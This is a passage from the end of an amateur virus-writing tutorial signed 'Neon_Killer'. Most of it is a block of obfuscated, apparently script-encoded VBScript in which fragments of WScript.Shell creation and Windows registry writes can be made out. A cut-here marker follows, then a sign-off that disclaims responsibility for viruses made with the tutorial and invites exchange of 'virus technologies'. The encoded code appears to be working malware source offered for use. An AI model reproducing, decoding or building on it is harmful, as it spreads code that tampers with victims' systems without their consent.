\(+J@#@&\lb+cfnVnObWY.?!4hrDP'~omVd+@#@&tlrRU+x9@#@&H+SHCk^b[[{JJ@#@&16Y@#@&@#@&U+DP\Xmj4+sV,xPq/^.bwY
/M+CY6(Ln1YvJkmMrwDRjtVsE*@#@&h.W6kV~xP@#@&tXm?4n^V
ILIl[crC|/i'?G0DAmDn'HbmDK/KWY'rx9WAd'ZEM.+
Y..dkKx'HGD24KNrYE#@#@&(W,nDGWbVnP{~rJ~:tx@#@&HHm?4+sVcInLqDkDnP@#@&J_F/j'?K0OhC.-\k1.WkWWO'kU[Khd-;;MDn
Yj+DkkKU-tW.w4W[rD+JB~J8J@#@&3UN,q6@#@&@#@&3    N~?!8@#@&YuwGAA==^#~@
<Cut Here...>


6.b: Final Words

        Finally I'd like to say that i accept no responsibility for any viruses,
destructive or
        not, that are created with this tutorial.

        If you wish to contact me with;

        -       new alternative virus technologies
        -       questions
        -       congratulations
        -       additions or mistake corrections

        Then feel free to do so with any of the above ( at the top of the doc ) contact
        information. I would especially like to make contact with any one with similar
        interests in the UK.

        Thanx and goodbye,
                Neon_Killer